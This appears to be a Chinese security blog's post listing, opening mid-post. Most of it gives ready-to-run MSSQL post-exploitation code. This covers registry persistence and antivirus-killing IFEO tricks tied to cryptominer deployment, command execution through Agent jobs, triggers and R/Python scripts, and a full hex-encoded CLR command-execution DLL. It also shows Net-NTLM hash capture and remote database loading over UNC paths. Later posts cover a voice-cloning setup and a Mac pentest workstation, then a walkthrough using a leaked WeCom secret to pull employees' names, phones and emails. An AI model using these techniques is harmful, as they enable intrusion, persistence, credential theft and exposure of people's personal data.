EXEC xp_regwrite N'HKEY_CLASSES_ROOT',
N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\TypeLib',N'',REG_SZ,
N'{420B2830-E718-11CF-893D-00A0C9054228}';
EXEC xp_regwrite N'HKEY_CLASSES_ROOT',
N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\Version',N'',REG_SZ,
N'1.0';

CMD AutoRun

当 CMD.exe（命令处理器）启动时，如果未指定 /D 标志，将执行 AutoRun 命令。

1
2

-- 将 CMD.exe 的 AutoRun 注册表项与软件可执行路径 (c:\windows\system32\calc.exe) 添加,作为持久化的后门
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Command Processor','Autorun','REG_SZ','c:\windows\system32\calc.exe'

Run & RunOnce

Run 和 RunOnce 注册表项会导致程序在用户每次登录时运行。

1
2

-- 通过将带有可执行路径 (c:\windows\system32\calc.exe) 的 Aut3 条目添加到此注册表路径，攻击者确保每次用户登录服务器时都会执行恶意软件。
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','Aut3','REG_SZ','c:\windows\system32\calc.exe'

注销，重新登录,触发 calc

禁用指定软件

攻击者需要确保在部署加密矿工时杀死反病毒进程以保持不被发现。所以可以设置在某些应用启动时自动关闭.

1
2

-- 禁用正在运行的进程的方法是使用 IFEO（Image File Execution Options），通过添加值为 taskkill 的调试器键，在这种情况下将杀死特定进程 Everything.exe：
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Everything.exe','Debugger','REG_SZ','taskkill.exe'

此时只要开启 Everything 就会自动关闭.

SQL Server Agent Job 代理执行计划任务利用

描述

SQL Server 代理是一项 Microsoft Windows 服务，它执行计划的管理任务，这些任务在 SQL Server 中称为作业。

利用条件

拥有 DBA 权限
需要 sqlserver 代理 (sqlagent) 开启，Express 版本Sql Server 是无法启用的

-- 开启 sqlagent 服务
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';

-- 利用任务计划命令执行（无回显,可以 dnslog）
-- 创建任务 test，这里test为任务名称，并执行命令，命令执行后的结果，将返回给文本文档out.txt

use msdb;
exec sp_delete_job null,'test'
exec sp_add_job 'test'
exec sp_add_jobstep null,'test',null,'1','cmdexec','cmd /c "whoami>c:/out.txt"'
exec sp_add_jobserver null,'test',@@servername
exec sp_start_job 'test';

CLR提权

描述

从 SQL Server 2005 (9.x) 开始，SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。这意味着现在可以使用任何 .NET Framework 语言（包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#）来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数。

https://docs.microsoft.com/zh-cn/sql/relational-databases/clr-integration/common-language-runtime-clr-integration-programming-concepts?view=sql-server-ver15

CLR 方式可以利用 16 进制文件流方式导入 DLL 文件，不需要文件落地

MDUT 中的16进制的dll

dll的制作可以参考下面的文章

https://xz.aliyun.com/t/10955#toc-12

利用条件

拥有DBA权限

-- 启用CLR,SQL Server 2017版本之前
sp_configure 'show advanced options',1;RECONFIGURE; -- 显示高级选项
sp_configure 'clr enabled',1;RECONFIGURE; -- 启用CLR
ALTER DATABASE master SET TRUSTWORTHY ON; -- 将存储.Net程序集的数据库配置为可信赖的

-- 启用CLR，SQL Server 2017版本及之后,引入了严格的安全性，可以选择根据提供的 SHA512 散列专门授予单个程序集的 UNSAFE 权限
sp_configure 'show advanced options',1;RECONFIGURE;
sp_configure 'clr enabled',1;RECONFIGURE;
sp_add_trusted_assembly @hash= <SHA512 of DLL>; -- 将某程序集的SHA512哈希值添加到可信程序集列表中

-- 配置 EXTERNAL ACCESS ASSEMBLY 权限, test 是我指定的数据库
EXEC sp_changedbowner 'sa'
ALTER DATABASE [test] SET trustworthy ON

-- 导入CLR插件
CREATE ASSEMBLY [mssql_CLR]
  AUTHORIZATION [dbo]
  FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300660705620000000000000000E00022200B013000000E00000006000000000000522C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000002C00004F00000000400000A802000000000000000000000000000000000000006000000C000000C82A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000580C000000200000000E000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000342C00000000000048000000020005007C2200004C0800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076342E302E33303331390000000005006C000000A8020000237E000014030000B403000023537472696E677300000000C8060000B4000000235553007C0700001000000023475549440000008C070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000D60101000000000006007001BA0206009001BA0206004601A7020F00DA02000006003C03E4010A005A015A020E001503A7020600EB01E40106002C027A0306002B01BA020E00FA02A7020A0086035A020A0023015A020600C401E4010E000302A7020E00D200A7020E004102A70206001402360006002102360006002700E401000000002D00000000000100010001001000E9020000150001000100030110000100000015000100040006007003790050200000000096008D007D000100842000000000960099001A0002005C22000000008618A102060004005C22000000008618A102060004006522000000008300160082000400000001007F0000000100F200000002002B03000001003A020000020010030900A10201001100A10206001900A1020A003100A10206005100A102060061001A0110006900A4001500710035031A003900A10206003900F50132007900E50015007100A403370079001D031500790091033C007900C20041007900AE013C00790087023C00790055033C004900A10206008900A1024700390068004D0039004F0353003900FB000600390075025700990083005C003900430306004100B6005C003900A90060002900C2015C0049000F0164004900CB016000A100C2015C00710035036A002900A1020600590056005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA0020000480000000000000000000000000000000004000000004000000000000000000000070005F000000000004000000000000000000000070004A00000000000400000000000000000000007000E40100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F3000496E743332003C4D6F64756C653E0053797374656D2E494F006D7373716C5F434C520053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E677468006D7373716C5F434C522E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D707479000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A00200000005E54E0227F5F5E409B9302C5EA5F62E7000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301080100070100000000040100000000000000006607056200000000020000001C010000E42A0000E40C000052534453F12CF9670467FE4789AA4C0BB3C9132401000000433A5C55736572735C546573745C736F757263655C7265706F735C6D7373716C5F434C525C6D7373716C5F434C525C6F626A5C44656275675C6D7373716C5F434C522E70646200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000282C00000000000000000000422C0000002000000000000000000000000000000000000000000000342C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004C02000000000000000000004C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004AC010000010053007400720069006E006700460069006C00650049006E0066006F0000008801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E00300000003C000E00010049006E007400650072006E0061006C004E0061006D00650000006D007300730071006C005F0043004C0052002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000044000E0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000006D007300730071006C005F0043004C0052002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000543C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  WITH PERMISSION_SET = UNSAFE;
GO

-- 创建CLR函数
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [mssql_CLR].[StoredProcedures].[ExecCommand]
go

-- 利用CLR执行系统命令
exec dbo.ExecCommand "whoami /all";

格式简化

-- 导入CLR插件
CREATE ASSEMBLY [clrdata]
AUTHORIZATION [dbo]
FROM 0x16进制的dll
WITH PERMISSION_SET = UNSAFE;

-- 创建CLR函数
CREATE PROCEDURE [dbo].[testclrexec]
@method NVARCHAR (MAX) , @arguments NVARCHAR (MAX)
AS EXTERNAL NAME [clrdata].[StoredProcedures].[testclrexec]

-- 利用CLR执行系统命令
exec testclrexec 'cmdexec',N'whoami'

利用触发器

触发器是一种特殊类型的存储过程，它不同于存储过程。触发器主要是通过事件进行触发被自动调用执行的。而存储过程可以通过存储过程的名称被调用。

SqlServer 包括三种常规类型的触发器：DML 触发器、DDL 触发器和登录触发器

登录触发器

登录触发器将为响应 LOGIN 事件而激发存储过程。与 SQL Server 实例建立用户会话时将引发此事件。登录触发器将在登录的身份验证阶段完成之后且用户会话实际建立之前激发。因此，来自触发器内部且通常将到达用户的所有消息(例如错误消息和来自 PRINT 语句的消息)会传送到 SQL Server 错误日志。如果身份验证失败，将不激发登录触发器。

-- 设置一个触发器 ffffffff0x,当 user 表更新时触发命令
set ANSI_NULLS on
go
set QUOTED_IDENTIFIER on
go
create trigger [ffffffff0x]
on [user]
AFTER UPDATE as
begin
    execute master..xp_cmdshell 'cmd.exe /c calc.exe'
end
go

-- user 表 update 更新时，自动触发
UPDATE user SET id = '22' WHERE nickname = 'f0x'

实际测试，可以看到执行命令卡住了,一直没有结束

查看任务管理器，calc 运行了

手动将 calc 结束,此时语句执行完毕返回结果，执行时间等于 calc 运行的时间

SQL Server R 和 Python 的利用

描述

在 SQL Server 2017 及更高版本中，R 与 Python 一起随附在机器学习服务中。该服务允许通过 SQL Server 中 sp_execute_external_script 执行 Python 和 R 脚本

利用条件：

Machine Learning Services 必须要在 Python 安装过程中选择

必须启用外部脚本

EXEC sp_configure ‘external scripts enabled’, 1
RECONFIGURE WITH OVERRIDE
重新启动数据库服务器
用户拥有执行任何外部脚本权限

R 脚本利用

-- 利用 R 执行命令
sp_configure 'external scripts enabled'
GO
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

-- 利用 Python 读文件
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'

-- 利用 R 抓取 Net-NTLM 哈希
@script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")'

Python 脚本利用

-- 查看版本
exec sp_execute_external_script
@language =N'Python',
@script=N'import sys
OutputDataSet = pandas.DataFrame([sys.version])'
WITH RESULT SETS ((python_version nvarchar(max)))

-- 利用 Python 执行命令
exec sp_execute_external_script
@language =N'Python',
@script=N'import subprocess
p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE)
OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
WITH RESULT SETS (([cmd_out] nvarchar(max)))

AD Hoc 分布式查询 & Microsoft OLE DB Provider for Microsoft Jet (沙盒提权)

AD Hoc 分布式查询允许从多个异构数据源（例如 SQL Server 的多个实例）访问数据。这些数据源可以存储在相同或不同的计算机上。启用临时访问后，登录到该实例的任何用户都可以使用 OLE DB 提供程序通过 OPENROWSET 或 OPENDATASOURCE 函数执行引用网络上任何数据源的 SQL 语句。

攻击者滥用 Ad Hoc 分布式查询和 Microsoft OLE DB Provider for Microsoft Jet 来创建和执行旨在从远程服务器下载恶意可执行文件的脚本。

利用条件

拥有 DBA 权限
sqlserver 服务权限为 system
服务器拥有 jet.oledb.4.0 驱动

-- 修改注册表，关闭沙盒模式
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

-- 开启 Ad Hoc Distributed Queries
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
GO
EXEC sp_configure 'ad hoc distributed queries', 1
RECONFIGURE
GO
-- Until SQL Server 2012

EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'AllowInProcess', 1
EXEC master.dbo.sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'AllowInProcess', 1

-- SQL Server 2014 or later
EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'DynamicParameters', 1
EXEC master.dbo.sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'DynamicParameters', 1

-- Windows 2003 系统 c:\windows\system32\ias\ 目录下默认自带了 2 个 Access 数据库文件 ias.mdb/dnary.mdb, 所以直接调用即可.
-- Windows 2008 R2 默认无 Access 数据库文件, 需要自己上传, 或者用 UNC 路径加载文件方能执行命令.
-- SQL Server2008 默认未注册 microsoft.jet.oledb.4.0 接口, 所以无法利用沙盒模式执行系统命令.

Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:\windows\system32\ias\ias.mdb',
'select shell("whoami")');

select * from openrowset('microsoft.jet.oledb.4.0',';database=\\192.168.1.8\file\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net user >c:\test.txt ")');

参考

m1 下配置 MockingBird 环境

Sun, 10 Apr 2022 13:08:03 +0800

这几天看到了很有意思的语音克隆项目 MockingBird,准备搭建环境看看，没想到还挺复杂的，以前没接触过 conda 这些，写个笔记记录下搭建过程

安装 homebrew

这个应该是最基础的了,反正也提一下

1
2
3

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> /Users/f0x/.zprofile
eval "$(/opt/homebrew/bin/brew shellenv)"

安装 ffmpeg

`1`	`brew install ffmpeg`

安装 libsndfile

1
2

brew install libsndfile
brew install portaudio

安装 miniforge

wget https://github.com/conda-forge/miniforge/releases/latest/download/Miniforge3-MacOSX-arm64.sh
mv Miniforge3-MacOSX-arm64.sh ~/
cd
bash Miniforge3-MacOSX-arm64.sh

1
2

source .zshrc
conda --version     # 测试一下conda是否安装完成

配置 conda 镜像源

conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/pytorch/
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/conda-forge/
conda config --set show_channel_urls yes
conda update --all

安装 pyqt5

conda install qt pyqt

brew install pyqt5
brew link --overwrite pyqt@5

用 conda 安装一些 pip 直接装会报错的模块

conda install -c conda-forge pytorch
conda install -c conda-forge python-sounddevice umap-learn inflect unidecode
conda install -c conda-forge llvmlite numpy matplotlib
conda install -c conda-forge librosa
conda install -c conda-forge numpy==1.20
conda install numba==0.53
conda install pypinyin
conda install -c conda-forge python-sounddevice
conda uninstall --force portaudio
conda install -c conda-forge python-sounddevice

cd
cd miniforge3/lib
mv libportaudio.2.dylib libportaudio.2.dylib.bak
brew info portaudio
ln -s /opt/homebrew/Cellar/portaudio/19.7.0/lib/libportaudio.dylib libportaudio.2.dylib
ls -al | grep libport

安装依赖模块

cd
git clone https://github.com/babysor/MockingBird.git
cd MockingBird

vim requirements.txt
# 进去把 PyQt5 llvmlite umap-learn inflect unidecode numpy 这几个删掉

pip3 install -r requirements.txt    # 安装剩下的依赖
pip3 install SoundFile

安装 webrtcvad-wheels

`1`	`pip3 install webrtcvad-wheels`

下载预训练模型

这里使用社区提供的模型

https://pan.baidu.com/s/1iONvRxmkI-t1nHqxKytY3g 百度盘链接 4j5d

下载完后在项目的 synthesizer 下创建个 saved_models 文件夹，把下载的文件放进去

启动Web程序

`1`	`python3 web.py`

如果报错 MemoryError: Cannot allocate write+execute memory for ffi.callback().
1 2 3

pip3 uninstall cffi pip3 uninstall pyopenssl pip3 install pyopenssl

启动工具箱

1
2

mkdir test
python3 demo_toolbox.py -d test

参考

mac m1 能不能作为安全渗透工作主力机

Tue, 05 Apr 2022 08:08:03 +0800

年初换了自己的主力机成 macbook ,由于是 arm 架构，一开始还比较担心兼容性问题，不过在实际使用了2个月后发现其实大部分兼容问题都可以解决，下面分享一些使用体验和解决方案。

能不能完成渗透任务

可以，基本没有问题

目前许多渗透软件都是开源的，大部分都是 python、go、java 平台的，python 和 java就不用说了，自己安装好环境，直接 clone 下来运行或编译就行，go的话，除了自己编译，大部分现在也提供了 mac 平台 arm 架构的打包版本。

以 f8x 中的渗透工具为例，在 mac 上基本都可以安装，就算有个别确实安装不了，在 linux 虚拟机上也是可以运行的，目前 f8x 已支持在 linux arm 架构上进行安装

能不能运行 windows 虚拟机

可以，前提是你需要(购买/弄到) Parallels 虚拟机软件

而且目前只能运行 windows11 arm 虚拟机，其他windows版本都不行

当然 windows11 arm 虚拟机里可以直接运行 x86,x64,arm 应用，兼容性还不错

burp 怎么装

https://www.sqlsec.com/2019/11/macbp.html

怎么进行apk渗透

https://infosecwriteups.com/android-pentesting-setup-on-macbook-m1-d2f1f0a8db4b

刚需

虚拟机软件 (Parallels)
- VMware Fusion 说实话没有 Parallels 好用,如果条件允许，买个 Parallels 会方便很多
内存要大
- 不知道是不是我使用方式的问题，只开 chrome 微信啥的日常占用就 10G 了,选购的时候内存往上加加吧

细节调优

国光师傅的这3篇文章介绍了 mac 系统下的一些配置优化调整，非常全，推荐

我自己也总结了mac的使用技巧和备忘录

https://github.com/ffffffff0x/1earn/blob/master/1earn/Plan/Mac-Plan.md

能不能打游戏

不能，开windows虚拟机也勉强不了，如果要开黑玩游戏，还是用 windows

企业微信+腾讯IM密钥泄漏利用

Thu, 31 Mar 2022 08:08:03 +0800

遇到一个企业微信access_token 和腾讯IM 密钥场景,搜了下,网上似乎没有多少公开的案例分享,有的也是比较简单的,所以简单记录一下利用过程,厚码保命,理解一下

info

本文首发先知社区 https://xz.aliyun.com/t/11092

泄漏企业微信 access_token

注⚠️ :脱敏脱敏脱敏代替原来的敏感数据

获得的配置文件内容

#腾讯企业微信企业id
qywx.corpid=脱敏脱敏脱敏
#腾讯企业微信管理后台的应用密钥
qywxapplet.appSecret=脱敏脱敏脱敏脱敏脱敏脱敏
#腾讯企业微信管理后台绑定的小程序appid
qywxapplet.appid=脱敏脱敏脱敏脱敏脱敏
#腾讯ocr appid,演示环境使用了腾讯的ocr接口，行方不使用腾讯ocr接口则不必配置这里。配置成"-"即可
ocr.tenc.appId=-
#腾讯ocr秘钥
ocr.tenc.secret=-
#网录制视频时分段时长，分钟，如无需求不要改动此项
duration=120

根据官方文档,先生成 access_token

https://developer.work.weixin.qq.com/document/path/91039

1
2
3

https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=脱敏脱敏脱敏&corpsecret=脱敏脱敏脱敏

eQq8YjcgxHOtk39Xu4d脱敏脱敏脱敏脱敏脱敏脱敏脱敏klx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏

access_token 的有效期通过返回的 expires_in 来传达，正常情况下为 7200 秒（2 小时），有效期内重复获取返回相同结果，过期后获取会返回新的 access_token。

根据官方服务,先查看 access_token 权限

https://open.work.weixin.qq.com/devtool/query

可以看到 access_token 权限，通讯录范围 - 部门，应用权限

根据官方文档

获取企业微信API域名IP段

https://developer.work.weixin.qq.com/document/path/92520

https://qyapi.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=eQq8YjcgxHOtk39Xu4d30脱敏脱敏脱敏脱敏脱敏脱敏脱敏lx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏

获取部门列表

https://developer.work.weixin.qq.com/document/path/90208

https://qyapi.weixin.qq.com/cgi-bin/department/list?access_token=eQq8YjcgxHOtk39Xu4d脱敏脱敏脱敏脱敏脱敏脱敏脱敏38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏

可以看到有很多部门

获取部门成员

https://developer.work.weixin.qq.com/document/path/90200

https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token=eQq8YjcgxHOtk39Xu4d30rJx0脱敏脱敏脱敏脱敏脱敏脱敏脱敏LE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏&department_id=1&&fetch_child=1

所有人的姓名和userid，归属部门

获取部门成员详情

https://developer.work.weixin.qq.com/document/path/90201

https://qyapi.weixin.qq.com/cgi-bin/user/list?access_token=eQq8YjcgxHOtk39Xu4d3脱敏脱敏脱敏脱敏脱敏脱敏脱敏ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏&department_id=1&fetch_child=1

所有人的姓名、手机号、头像、企业微信二维码、邮箱

获取单个部门详情

https://developer.work.weixin.qq.com/document/path/95351

https://qyapi.weixin.qq.com/cgi-bin/department/get?access_token=eQq8Yjc脱敏脱敏脱敏脱敏脱敏脱敏脱敏lx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏&id=963233

查看下子部门的详情

获取加入企业二维码

https://developer.work.weixin.qq.com/document/path/91714

https://qyapi.weixin.qq.com/cgi-bin/corp/get_join_qrcode?access_token=eQq8YjcgxHOtk3脱敏脱敏脱敏脱敏脱敏脱敏脱敏w6Owklx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏

仅通讯录同步助手或第三方通讯录应用可调用。

这个 accesskey 是普通应用，普通应用的secret仅有只读权限，所以不能创建成员，获取加入企业二维码也没有权限，因为这个接口也须拥有通讯录的管理权限，需要使用通讯录同步的Secret

创建成员

https://developer.work.weixin.qq.com/document/path/90195

POST /cgi-bin/user/create?access_token=eQq8YjcgxH脱敏脱敏脱敏脱敏脱敏脱敏脱敏-w6Owklx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏 HTTP/1.1
Host: qyapi.weixin.qq.com
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

{
   "userid": "test123",
   "name": "啊啊啊",
   "department": [1],
   "mobile":"13888888888"
}

仅通讯录同步助手或第三方通讯录应用可调用。

获取企业所有打卡规则

https://developer.work.weixin.qq.com/document/path/93384

https://qyapi.weixin.qq.com/cgi-bin/checkin/getcorpcheckinoption?access_token=eQq8YjcgxHOtk39脱敏脱敏脱敏脱敏脱敏脱敏脱敏i-w6Owklx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏

还有获取员工打卡规则、获取打卡记录数据、获取打卡日报数据、获取打卡月报数据、获取打卡人员排班信息,这里就不一一测试了

还有获取成员假期余额

POST /cgi-bin/oa/vacation/getuservacationquota?access_token=eQq8YjcgxHOtk39Xu4脱敏脱敏脱敏脱敏脱敏脱敏脱敏lx38ULE60ISuQvXMLNcsHtyNqsw3wn5hd0vM脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏脱敏 HTTP/1.1
Host: qyapi.weixin.qq.com
Connection: close
X-Forwarded-For: 101.226.129.166
Content-Type: application/json
Content-Length: 31

{
    "userid": "脱敏脱敏脱敏"
}
